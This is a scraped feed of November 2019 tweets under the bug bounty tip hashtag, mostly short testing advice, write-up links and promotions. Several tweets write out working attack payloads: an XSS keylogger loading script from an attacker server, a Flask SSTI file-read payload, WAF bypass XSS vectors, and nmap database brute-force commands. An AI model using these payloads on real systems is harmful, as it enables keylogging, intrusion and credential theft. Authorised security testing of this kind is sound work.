2 Configuring Frida with #BurpSuite and #Genymotion to #bypass #Android #SSL Pinning #LINK :- https://t.co/jLWK2f7dx6 #cybersecurity #Pentesting #pentest #hacking #bugbountytips #bugbounty #bugbountytip https://t.co/JIZt1QUzHi
x1m
@x1m_martijn


2019-11-20 09:23:49
0 Someone else is using my xsshunter payload :p I don't mind heheheh #bugbountytip
Vikash Chaudhary
@OffensiveHunter


2019-11-20 03:49:31
2 #BugBountyTip if you are not getting bounty then hunt these bugs on any program first , you will surely get. it's very easy to hunt these bugs. Regards! #Vikash #Chaudhary CEO & Founder (#HackersEra #Cyber #Security #Consultancy & #Training PVT LTD) mail
https://t.co/NHBnVkBMWH
YogoshaOfficial
@YogoshaOfficial


2019-11-19 16:08:30
10 [#bugbountytip] : If you're blocked by WAF during your pentest, try to hide your IP by forcing the proxy to remove all possible headers by using hop-by-hop headers Exp: Connection: close, X-Originating-IP ,X-Forwarded-For , X-Remote-IP , X-Remote-Addr @TnMch_
Mantis
@MantisSTS


2019-11-19 15:07:52
2 What word lists do you have most success with to find admin panels? RT for reach! #BugBounty #bugbountytip
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-19 14:11:17
2 Maximise Bug Bounty Scope - Gather Subdomains using Facebook Certificate Transparency Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting https://t.co/AjSRBqt57p
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-19 14:00:03
3 Cross Site Scripting Basics - OWASP Juice Shop Tutorial OWASP Top Ten Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #Pentesting https://t.co/0wdvBhdOHw
bugbountytip
@a_l_e_r_t_1_


2019-11-19 11:16:24
1 Stored XSS on gitlab - 2 #bugbountytips #bugbountytip https://t.co/eaW3avmcpK
Raad Haddad
@raadfhaddad


2019-11-19 07:17:36
2 Read headlines of the company's policies, make sure they implement it correctly, especially when it comes to insecure data storage. I found something related to this in Facebook last year! And yes, i got rewarded for my finding. #bugbountytip #bugbounty #security
_ABDOUL_GAFFHAR_
@mrgaphy


2019-11-19 06:21:42
0 My next open source project I want to make an automated tool that will search leak credentials in log and config files. I always seem to find exposed credentials in log or configuration files. #bugbountytips #BugBounty #bugbountytip #osint #pentest #webappsec #redteam #infosec
void
@gowridash


2019-11-19 04:57:35
0 @facebook Still Notification #bug #defect is not fixed? During shifting Mobile data/Wi-Fi already read/seen posts are showing as new ones #Android9 Is it so difficult to fix this #issue #bugbountytip
tololovejoi
@tolo7010


2019-11-18 23:01:07
0 1% of new bug bounty hunters ask for knowledge, 99% of them ask for motivation #bugbounty #bugbountytip #infosec #hacking
გოჩა ოჄრაძე (Gocha Okradze)
@GochaOqradze


2019-11-18 22:35:10
0 #bugbountytip #bugbountytios all of bug hunters writes try to understand web app. Writes some payloads :) But no one write about detection methodology :) Try to understand every vuln and what you need search in response body after sending payload.
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-18 22:14:56
1 Remember that *pht* files can be used to execute PHP code. Old #bugbountytip
m0z
@LooseSecurity


2019-11-18 18:41:49
6 I once exploited SSTI in flask app with payload: {{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40](\"/tmp/flag\").read() }} If you find SSTI, you NEED to show how to exploit! Reading files is perfect. #bugbountytips #BugBounty #bugbountytip payload not by me
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 18:07:09
0 [Tutorial] My Tutorial collection for SHELLING+ROOTING WEBSITES ----- COMMENT HERE and will share the link ! Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 17:56:50
0 Hacking Windows PC using Metasploit u TORRENT Tutorial by Hackdoor on WebDav_dll Hijacking https://t.co/yznzTvdCrC Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips https://t.co/OT1MPRtl86
â‚Źđ””đ”­đ”©đ”Źđ”Šđ”±đ” 0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-18 17:40:28
1 [[[FREE]]] Biggest Repository of Ebooks (hacking, penetration testing, tool , programming and more) ! Comment Here and I will share the Link with you -- Limited Users only !! #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops
Halil AHMAD
@Halilahmadd


2019-11-18 11:33:37
0 Second Time Hall Of Fame #BugBounty #XSS #BugBountyTip #infosec https://t.co/Q0WGIKRgpt
HamdiSevben
@HmdSvbn


2019-11-18 11:08:14
0 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/fhokFhyIyj -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/C56oHA2Aua -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/RmE8h4eP6R #bugbountytip #Hacking #redteam
Ali TĂŒtĂŒncĂŒ
@alicanact60


2019-11-18 10:34:55
2 Last night, worked about 1 hour and got one triaged report. Waiting payment. @Hacker0x01 #BugBounty #bugbountyips #bugbountytip 1. Always look at all request. Maybe you can find a redirect parameter. 2. This payload can be useful for open redirects: //[email protected] https://t.co/VsUp6O1vCt
Ammar Amer🇾🇟
@cry__pto


2019-11-18 09:54:28
5 -1-A penetration tester’s guide to sub-domain enumeration.pdf: https://t.co/OOd6Z3Qc1M -2-Comprehensive Guide on Metasploitable 2.pdf: https://t.co/HoinO16IyM -3-Android Apk reverse engineering using Apktool and Frida.pdf: https://t.co/Lz7WTH1mzY #bugbountytip #Hacking #redteam
OCK le Fécond
@OscLFecond


2019-11-18 07:36:58
1 How to Bypass SSL Pinning on Android : -Root your devices -Install your mitm cert -Move it from data/misc/user/0/cacerts-added -To /system/etc/security/cacerts -No need Frida - Enjoy <3 #AndroidSecurity #MobileSecurity #bugbountytip #bugbountytips
Shantanu Kulkarni
@Iamshantanukul


2019-11-18 05:51:21
0 If a failed login caused application to send a warning email to user , any user data incorporated into the email may need to be checked for SMTP injection attacks. #bugbountytip #hackerone #bugcrowd #bughunting #bugbounty #pentesting #hacking #cybersecurity #bugbountytips
darkmage
@therealdarkmage


2019-11-18 05:35:52
0 Aw fooey, my most recent submission to @Bugcrowd was marked as "duplicate"...meaning it was still a legit concern! Heck yeah, I am learning and leveling up! - It was an open redirect on a website where I overcome a whitelist using a double-redirect 😎 #bugbounty #bugbountytip
Imran nissar
@Imrannissar3


2019-11-18 05:18:49
4 How bash can be used for automation #bugbounty #bugbountytip https://t.co/heUev6rsuI
m0z
@LooseSecurity


2019-11-17 20:46:27
0 Always remember to test for SSTI (Server-Side Template Injection). Test for it the same way you would for XSS. A few simple payloads like {{7*7}} and if they get replaced by '49' then you've just found a high/critical vulnerability. You need to get a PoC though! #bugbountytip
Halil AHMAD
@Halilahmadd


2019-11-17 20:16:17
5 REMOTE XSS KEYLOGGER Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
ghostlulz
@ghostlulz1337


2019-11-17 18:37:46
7 I always seem to find exposed credentials in log or configuration files. These are easy wins that take 10 seconds to find. More info on my blog: https://t.co/Kft6p37wJM #bugbountytips #BugBounty #bugbountytip #osint #pentest #appsec #redteam #infosec #pentesting #logs #config https://t.co/Vf4AJs2sn7
A hacker's life
@Unknownuser1806


2019-11-17 12:12:55
0 STEALING $10,000 YAHOO COOKIES! https://t.co/PSImiH4oNc JUMPING TO THE HELL WITH 10 ATTEMPTS TO BYPASS DEVIL’S WAF: https://t.co/IpzdET7XVb #bugbounty,#bugbountytip,#cybersecurity,#hacking,#infosec
bugbountytip
@a_l_e_r_t_1_


2019-11-17 10:30:09
2 Less than 1$... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AaUIgsgeiM
sagar yadav
@sagaryadav8742


2019-11-17 04:01:58
0 Fun time with @stokfredrik ✌ and @sechunt3r 😁in #bsidesahmedabad #bugbountytip #bugbounty #bughunting #bugcrowd #cobalt #nullcon #hackerone #Intel #BountyHunter #bounty #secure #zerocopter #happy #sagaryadav8742 https://t.co/vzkOVrKygS
Bogdan Tcaciuc
@bogdantcaciuc7


2019-11-17 02:38:05
0 #bugbountytip Always try to access the localStorage when you get an XSS vulnerability. Just managed to retrieve the JWT tokens and user PII information stored on localStorage.
Gillis Jones
@Gillis57


2019-11-17 00:29:13
0 #bugbountytip If you're using a shared environment, and see someone else's injections are messing up the environment for other testers- take the 5 minutes necessary to try to clean up after the other tester that don't respect you enough to do the same.
Ammar Amer🇾🇟
@cry__pto


2019-11-16 23:00:56
6 -1-Recon Everything.pdf: https://t.co/mRJV7fnMQg -2-Open Source Web Reconnaissance with Recon-ng.pdf: https://t.co/V1mV1NNzTB -3-12 OSINT Resources For E-mail Addresses.pdf: https://t.co/EgR3LoHoAm -4-OSINT.pdf: https://t.co/wDNvAWXATu #OSINT #bugbountytip #redteam #Pentesting
tololovejoi
@tolo7010


2019-11-16 20:55:10
3 Bug bounty is not possible if there is no publicly disclosed reports at @Hacker0x01 #bugbounty #bugbountytip #infosec #hacking
healthyoutlet
@healthyoutlet


2019-11-16 19:27:50
0 If you're writing cli tools that people will be using in bash, consider sending all your banners and verbose output to stderr so that the main output can be cleanly piped into other tools. In python you can use sys.stderr.write() #bugbountytip
swordfish
@swordfi96641916


2019-11-16 19:05:46
0 Response: Cannot GET / .. tried all the HTTP Request headers. Any tips on what's next? #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:41:28
0 site:"https://t.co/XdC6eMbugO" pdf -- High level information disclosure !!! User's phone numbers, addresses .... #bugbountytips #bugbountytip https://t.co/7qG4z5s7CZ
bugbountytip
@a_l_e_r_t_1_


2019-11-16 18:37:12
1 Less than 1$...(Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/Dq4zebkM4o
Berk Bulan
@berk_bulan


2019-11-16 14:56:09
0 Dns Zone Transfer script #BugBounty #bugbountytip #bugbountytips https://t.co/aKUoARVYQ7
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-16 14:32:21
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/nbOwGUl1dF
Hussein Daher
@HusseiN98D


2019-11-16 12:42:59
9 To everyone who has been following me, you know I was taking a #bugbounty challenge: 30days $30k Started 20/10. Some bugs still unpaid. I've failed. Still 4 more days to go to complete but I'll be stopping here, I feel really tired. #bugbountytip #bugbountytips #infosec #pentest https://t.co/VRoYeMrxuo
Elsadat
@M0_SADAT


2019-11-16 10:57:28
0 Read THE JS FILES #bugbountytip
Zero Xyele
@zeroxyele


2019-11-16 08:19:05
3 Simple Python Script for Host Header Redirection Attack [Multithreaded] https://t.co/LIHgGibs5Z I was awarded 150$ in ten minutes by using that tool 😎 #bugbounty #bugbountytip #bugbountytips #hackerone #hacker101
evryd4y
@evryd4y


2019-11-16 05:56:12
1 Handy for passive enum https://t.co/G8fYKfqLTG #bugbountytip
Ashish Kunwar
@D0rkerDevil


2019-11-16 02:07:43
0 @TakSec Param miner extension can find this. :) #bugbountytip
Gillis Jones
@Gillis57


2019-11-15 23:40:15
0 #bugbountytip If you're using a shared environment with other testers. The rules are very similar to hiking. #leavenotrace- leave the environment like you found it. If you leave damn injections all over the place rendering it unusable, you're an asshole.
Hussein Daher
@HusseiN98D


2019-11-15 20:43:37
2 So today I've found an SQLi in a cookie. Many people only stick to parameters. Test cookies too! #bugbounty #bugbountytips #bugbountytip
Sagar Tanur
@Sagarvd01


2019-11-15 15:50:12
1 Here's a write up of how I could've accessed sensitive PII and private data of tens of thousands of Indians. https://t.co/uby8wggKPx #bugbounty #bugbountytips #BugBountyTip #hacking #infosec #writeup
Halil AHMAD
@Halilahmadd


2019-11-15 15:33:54
0 XSS on a login page while stuck in an input tag with <> filtered. Final Payload: " formaction=java%26Tab%3bscript:ale%26Tab%3brt() type=image src="" #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
bugbountytip
@a_l_e_r_t_1_


2019-11-15 13:55:48
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #bugbountytip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #bugbountytips https://t.co/np0PsJg3GY
Ammar Amer🇾🇟
@cry__pto


2019-11-15 12:38:47
8 -Brute forcing MySQL passwords: nmap -p3306 --script mysql-brute xx.xx.xx.xx -Brute forcing MS SQL passwords: nmap -p1433 --script ms-sql-brute xx.xx.xx.xx -Brute forcing Redis passwords: nmap -p6379 --script redis-brute xx.xx.xx.xx #nmap #hacking #Pentesting #BugBountyTip
Pascal S
@PascalSec


2019-11-15 12:22:39
0 [1/2] #BugBountyTip So this is a pretty basic one but I happen to forget about it over and over again. Before starting a new pentest engagement, clear all your cookies and browser cache. Happened to me many times before that I was asking myself what a specific cookie was for...
Ammar Amer🇾🇟
@cry__pto


2019-11-15 11:51:49
6 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -XSS via HTTP Headers.pdf: https://t.co/jiQJnioGwt -SQL Injection & XSS Playground.pdf: https://t.co/9QZCtkFcx7 -XSS Exploitation in DVWA (Bypass All Security).pdf: https://t.co/dzwO0TwHCF #bugbountytip #xss #Hacking
Elsadat
@M0_SADAT


2019-11-15 10:18:09
2 Finally✌Acknowledged by @BMW Security Team for 2019 after finding bug in the main domain ;) #bugbountytip ? 1-There is something left for you 2-Always try to Escalate everything you find! 3-NEVER GIVE UP HOF Link:https://t.co/RdsatALn39 (Ahmed Elsadat) #HOF #BugBounty #infosec https://t.co/otgetMsWC0
bugbountytip
@a_l_e_r_t_1_


2019-11-15 08:51:29
1 Less than 1$... More than 5000 line. Everywhere... You dont need internet. Constantly updating... Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/e5k6XeQeK2
Ammar Amer🇾🇟
@cry__pto


2019-11-15 02:35:29
7 -Top GitHub Dorks and Tools Used to Scan GitHub Repositories for Sensitive Data.pdf: https://t.co/hM7HIZM56f -Pentesting Cheatsheet.pdf: https://t.co/tGxEQsqiQO -Windows Userland Persistence Fundamentals.pdf: https://t.co/uB0pSeXDP3 #PenTest #OSINT #bugbountytip #Hacking #infosec
Ammar Amer🇾🇟
@cry__pto


2019-11-14 23:24:33
4 -XSS cheat sheet portswigge.pdf: https://t.co/lSCq9VHoYF -Top GitHub Dorks and Tools: https://t.co/hM7HIZM56f -Pentesting Cheatsheet: https://t.co/zFwYAhCAba -Pentesting Cheatsheet2.pdf: https://t.co/34YEhESX58 -Pentesting Cheatsheets.pdf: https://t.co/tGxEQsqiQO #BugBountyTip
Sagar Tanur
@Sagarvd01


2019-11-14 17:02:57
0 A write up on how I was able to take over 4 tabs in Facebook's own Facebook pages. https://t.co/gmwro4xl5T #bugbounty #bugbountytips #BugBountyTip #writeup @Hacker0x01 @Bugcrowd
yourXss
@yourXss


2019-11-14 16:20:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal

YogoshaOfficial
@YogoshaOfficial


2019-11-14 13:33:08
7 [#Bugbountytip] ExpressJs runs on port 3000 , and if debug is on, then a lot of information can be disclosed exp : http[s]://example.com:3000/debug/pprof/heap?debug=1 Thanks @D0rkerDevil for this great tip ! Feel free to send us more #hackertips to share with the community
Ankit Thakur @bsidesahmedabad
@rudra16t


2019-11-14 09:00:01
1 Yeah looking forward to see you all at @bsidesahmedabad #bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/5HTiT8AQF2
Wh11teW0lf
@Wh11teW0lf


2019-11-14 06:54:48
0 #BugBountyTip Yesterday i found disclosure of AWS keys via /AWSconf.git/ folder instead of /.git/ folder
tololovejoi
@tolo7010


2019-11-14 06:42:39
0 Hacking doesn't take some times, it takes forever. #bugbounty #bugbountytip #bugbountytips #hacking
Evan Custodio
@defparam


2019-11-14 04:53:14
0 Gotta take breaks from hacking clear your mind. Stayed away from the computer last weekend and spent all Saturday plumbing in this sleek softener system with my buddy. Started recon again and filed 2 High/Crit HTTP Request Smuggling bugs today. Stay rested y’all #BugBountyTip https://t.co/8GeWvj0YO9
Halil AHMAD
@Halilahmadd


2019-11-14 04:37:17
3 CloudFlare XSS Bypass Payload: <a"/onclick=(confirm)()>Click Here! #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
yourXss
@yourXss


2019-11-14 04:10:00
0 RT @HusseiN98D: TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveal

bugbountytip
@a_l_e_r_t_1_


2019-11-13 23:51:28
0 Now again less than 1$ !!! (short time) (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/3eMttPxf6k
Alex Birsan
@alxbrsn


2019-11-13 20:21:12
0 #bugbountytip: Give some non-platform programs a try! No stats to worry about, no drama, no superfluous processes. Just you and the scope. https://t.co/dJRxMEekdO
Mourad
@SecuAudit


2019-11-13 17:51:56
0 Terrible Experience - Unfortunately with asian gaming companies at @Hacker0x01 programs , mostly they even don't answer msgs ... really not a very good experience . #bugbounty #BugBountyTip
Gwendal Le Coguic
@gwendallecoguic


2019-11-13 16:51:45
1 onliner to resolve the host of a given url #bugbountytip #tools #onliner host `echo $url|sed "s/.*:\/\///"|cut -d '/' -f 1|cut -d '@' -f 2|cut -d':' -f 1` https://t.co/DYokxgu5B4 https://t.co/ZnkGnGvBsy
yourXss
@yourXss


2019-11-13 16:00:00
3 TimeForA #BugBountyTip I use https://t.co/2deV884VM2 to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👍
Hussein Daher
@HusseiN98D


2019-11-13 15:58:28
3 TimeForA #BugBountyTip I use https://t.co/TKsmKBnl8M to find defaced (sub) domains of the website I am testing. This reveals subdomains, potentially defaced /dir/ (if not index). I pursue testing using the data I got. #bugbounty #bugbountytips #pentest #infosec Get CREATIVE RT👍
Noman | Ù†ŰčÙ…Ű§Ù† | à€šà„‹à€źà€Ÿà€š
@nomanAli181


2019-11-13 15:56:14
0 Took hours to turn this from 'possible' SQL Injection to finally exploit it coz It was Blind + webserver was blocking a bunch of chars. Learn SQL syntax coz sqlmap won't help/work in all cases ;) #bugbounty #bugbountytip https://t.co/B29DV9d0Bw
HackIsOn Âź
@hackison


2019-11-13 14:36:43
0 Credits: @erbbysam #bugbounty #bugbountytips #BugBountyTip https://t.co/zqGpyjfaWp
Ammar Amer🇾🇟
@cry__pto


2019-11-12 19:30:18
6 -Getting Started in BugBounty Hunting.pdf https://t.co/ZSTyAcvGQx -OSCP-Survival-Guide.pdf: https://t.co/bmTXPteO6m -TLS&SSL Penetration Testing.pdf: https://t.co/HsFlycdTAc -Evil Twin Attack:The Definitive Guide.pdf: https://t.co/IjzR0QaAJp #bugbountytip #hacking #Pentest #OSCP
bugbountytip
@a_l_e_r_t_1_


2019-11-12 18:50:47
1 Now less than 1$ (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Hussein Daher
@HusseiN98D


2019-11-12 17:20:38
22 Time for another #BugBountyTip : While testing file upload forms on IIS7 servers, you can get RCE by uploading ".cer" files if ".asp" extension is blacklisted. This already let me to multiple RCEs in #bugbounty and #pentest projects. #bugbountytips RT if you love! More coming 👍
Halil AHMAD
@Halilahmadd


2019-11-12 13:42:22
2 Here is a nice Bootstrap vector that has recently been added to the XSS cheat sheet by <xss class=progress-bar-animated onanimationstart=alert(1)> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security
Yadhavi
@PrincessYadhavi


2019-11-12 12:37:25
0 somewhere i heard about a tool which can grep through burp saved files(sitemap -> right click,-> save selected items). i forgot the name. anyone know about? #bugbounty #bugbountytips #bugbountytip #burpsuite
Hussein Daher
@HusseiN98D


2019-11-12 11:17:30
4 CHEAP VPS UBUNTU SERVERS: I receive many messages asking where to get a cheap/good VPS for #bugbounty You can have a good server for as low as $2/month month by using my 50% discount code D98KTCA15Y on https://t.co/xl74Mwv0PB ! BTC payment supported #bugbountytips #bugbountytip
0day work
@0daywork


2019-11-12 00:57:50
0 #BugBountyTip Always check for #RaceConditions when redeeming coupons to get greater discounts and huge bounties ;-) #Bugbounty #OWASP #ITSecurity https://t.co/k3ZlbRmVBO
stoXe
@DevinStokes


2019-11-11 23:09:16
6 Remote XSS Keylogger: Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)> This will log a user's input to your remote server. #BugBounty #BugBountyTip #XSS https://t.co/WvH30bUbyF
m0z
@LooseSecurity


2019-11-11 20:48:29
1 League of Bounties: Almost 600 members and growing! Ask your #BugBounty questions and get #bugbountytips from the top bug bounty hunters and whitehat hackers in the community. #BugBountyTip Joining our discord increases bug bounty luck by 15%. https://t.co/WTsdy7VJXI
Mourad
@SecuAudit


2019-11-11 20:22:33
0 i've accumulated more than 10 reports closed as informative this week , time to take a break relax and evaluate my pentesting approach #bugbountytips #BugBountyTip https://t.co/nnJ3KLJVYr
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:36:40
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ITiMzEy1ED
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:35:46
5 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/ZTpv2Gq4ux
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:32:05
0 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/fzDOZJDHd6
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:30:38
1 Get Hall of Fame and Bug Bounty With Hackdoor Trainings Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/jotHFAux1f
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:29:34
3 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/uNTTXRVKRA
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-11 18:28:36
0 Malware Alert !!! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/jGlhtpTFpR
Halil AHMAD
@Halilahmadd


2019-11-11 15:23:23
2 Here I want to share with you this magnificent. > Application bypass < <%0crameset%20src=''> #BugBounty #XSS #BugBountyTip #infosec #Bypass #Hackerone #Firewall #Security https://t.co/nN7haNHr97
ALL ABOUT HACKER
@AboutHacking


2019-11-11 13:38:35
3 Understanding HTTP Headers and cookie. Read: https://t.co/ZcHq5v6Ri8 #cybersecurity #cybersec #bugbounty #BugBountyTip #bugbountytips https://t.co/W0zQT2sn9D
intigriti
@intigriti


2019-11-11 12:46:04
6 [email protected]'s #BugBountyTip: Check JSON responses for additional properties, and send them back! 👀#HackWithIntigriti https://t.co/qIwEXtV9S8
Henry Chen
@chybeta


2019-11-11 10:54:10
0 Apache Flink Dashboard -> upload a malicious JAR -> submit new job -> getshell #bugbounty #bugbountytips #BugBountyTip https://t.co/lWNNCXHvvt
bugbountytip
@a_l_e_r_t_1_


2019-11-11 10:11:42
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor https://t.co/AoovNBqGht
Brodie Codie
@brodie_codie


2019-11-10 22:45:20
0 Tip 1. Passive, Active scanning and enumeration Probe the target Gather as much information about the target as possible Short List of Tools i like (Amass, Assetfinder, Pdlist, Dnsrecon, Dig, Wafw00f, Masscan, Dirsearch ) What tools do you like? #bugbountytips #BugBountyTip
ghostlulz
@ghostlulz1337


2019-11-10 22:15:04
8 You have probably heard of Subdomain Hijacking(takeover) but what about Broken Link Hijacking? You can utilize this vulnerability to get some easy Stored XSS wins. More info on my blog: https://t.co/Up6LfsdBs7 #bugbounty #bugbountytip #bugbountytips #infosec #redteam #pentest #xss https://t.co/uKA4V3uOZZ
Halil AHMAD
@Halilahmadd


2019-11-10 21:56:46
0 Bypass is required if you need to use quotes in some encodings where single and double quotes are blocked <IMG SRC=`javascript:alert(“Halil?, ‘XSS’”)`> #BugBounty #XSS #BugBountyTip #infosec #Bypass
Halil AHMAD
@Halilahmadd


2019-11-10 21:55:46
0 Let's say they blocked the site with nail. What will we do? Here is the solution: <IMG SRC=javascript:alert("XSS")> #BugBounty #XSS #BugBountyTip #infosec #Bypass
bugbountytip
@a_l_e_r_t_1_


2019-11-10 21:03:44
1 (Just a little bit earning for my master degree).. Learn & Hack & Earn https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
0day work
@0daywork


2019-11-10 20:47:57
3 #BugbountyTip: Change request parameters from scalar (val=foo) to array (val[]=foo) for #XSS #Bugbounty #OWASP https://t.co/eVOBz8WtwT
Tannay Bagga
@BaggaTannay


2019-11-10 19:56:19
0 Getting my hands on docker for building #Recon tools.I must say it makes the installation task so hassle free!#bugbountytips #opensource #BugBountyTip #Docker
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-10 19:21:56
0 Mass RDP ATTACKS #BlueKeep Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/NTSGfnFBo5
€𝔔𝔭𝔩𝔬𝔩𝔱𝔠0𝔡𝔱𝔯
@vanshitmalhotra


2019-11-10 18:49:55
2 Linux Commands for Bug Hunters and Hackers !! Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/GIgkZB5KK9
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:33:29
2 Sometimes login endpoints submit the password twice in POST data. If you need to perform a credentials guessing attack with Burp Suite: 1) Use Cluster bomb, 2) Use "Copy other payload" to copy from 1st password placeholder. See pictures. #burpsuitetip #bugbounty #bugbountytip https://t.co/pY7ga2bbsb
Nick || hunt4p1zza
@ngkogkos


2019-11-10 18:20:31
